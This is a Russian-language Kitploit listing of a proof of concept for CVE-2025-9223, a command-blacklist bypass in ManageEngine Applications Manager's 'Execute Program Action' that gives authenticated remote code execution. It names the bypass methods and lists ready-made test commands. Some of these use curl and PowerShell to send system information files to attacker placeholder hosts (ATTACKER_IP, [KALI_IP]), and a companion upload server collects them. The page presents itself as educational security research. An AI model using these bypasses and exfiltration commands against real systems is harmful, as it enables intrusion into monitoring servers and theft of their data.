Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-9223 — PoC для CVE-2025-9223 | Kitploit
Инструменты/GitHubGitHub/networkkiller/cve-2025-9223
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubnetworkkiller/cve-2025-9223

CVE-2025-9223

PoC для CVE-2025-9223

Репозиторий
29 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Applications Manager - Execute Program Action Bypass PoC

Security Research Python 3.x Proof of Concept

📖 Описание

Этот репозиторий содержит концептуальную проверку (PoC), демонстрирующую уязвимость выполнения команд в функции "Execute Program Action" в ManageEngine Applications Manager.

🔍 Детали уязвимости

Applications Manager использует чёрный список (BlackListCommands) для блокировки опасных команд, но валидация имеет критические недостатки:

  • Валидация на основе строк только по первому токену
  • Отсутствие нормализации путей или разворачивания переменных окружения
  • Отсутствие защиты от косвенного выполнения через скрипты

🚨 Методы обхода

МетодПример
Абсолютный путьC:\Windows\System32\netstat.exe
Переменные окружения%SystemRoot%\System32\netstat.exe
Скрипт-обёрткаecho netstat > a.bat && a.bat

💥 Воздействие

  • ✅ Аутентифицированное удалённое выполнение кода (RCE) на хосте Applications Manager
  • ✅ Полное выполнение системных команд в обход ограничений безопасности
  • ✅ Эксфильтрация данных с помощью системных утилит (curl, powershell, certutil)

📤 Пример эксфильтрационного пейлоада

root@kitploit:~
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload

🛠️ Настройка и использование

Предварительные требования

  • Python 3.x
  • Сетевой доступ к целевой инстанции Applications Manager
  • Аутентифицированный доступ с правами "Execute Program Action"

Сервер приёма файлов

Скрипт upload_server.py предоставляет простой HTTP-сервер для приёма эксфильтрированных файлов.

Базовое использование

root@kitploit:~
python3 upload_server.py

Расширенные параметры

root@kitploit:~
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads

Параметры

  • --host: Адрес привязки (по умолчанию: 0.0.0.0)
  • --port: HTTP-порт (по умолчанию: 8000)
  • --dir: Каталог вывода (по умолчанию: текущий каталог)

API Endpoints

Функции безопасности

✅ Защита от path traversal
✅ Уникальные имена файлов с временной меткой
✅ Регистрация запросов с IP и User-Agent
✅ Проверка типа содержимого

🎯 Тестовые команды

Создайте файл test_commands.txt с примерами обхода:

root@kitploit:~
# Обход с абсолютным путём
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# Обход с переменными окружения
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# Обход со скриптом-обёрткой
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# Примеры эксфильтрации данных
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"

⚠️ Правовое уведомление

ВАЖНО: Этот инструмент предоставляется исключительно в образовательных целях и для авторизованного тестирования.

❌ НЕ используйте на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения
❌ НЕ используйте для любых незаконных действий
✅ ИСПОЛЬЗУЙТЕ только в контролируемых средах для исследований в области безопасности
✅ ПОЛУЧИТЕ соответствующее разрешение перед проведением тестов

Автор не несёт ответственности за любое неправомерное использование этого инструмента. Пользователи берут на себя всю ответственность и риск.

📄 Лицензия

Этот проект предназначен только для исследовательских и образовательных целей. Все права защищены.

👨‍💻 Автор

Johan Aybar - В образовательных целях


⚠️ НАПОМИНАНИЕ: Этот PoC должен использоваться только в авторизованных тестовых средах. Несанкционированное использование может быть незаконным и строго запрещено.

Скачать инструмент
МетодEndpointОписание
GET/Список недавно загруженных файлов
POST/uploadЗагрузка файлов (multipart/form-data)
PUT/upload/[filename]Прямая загрузка файлов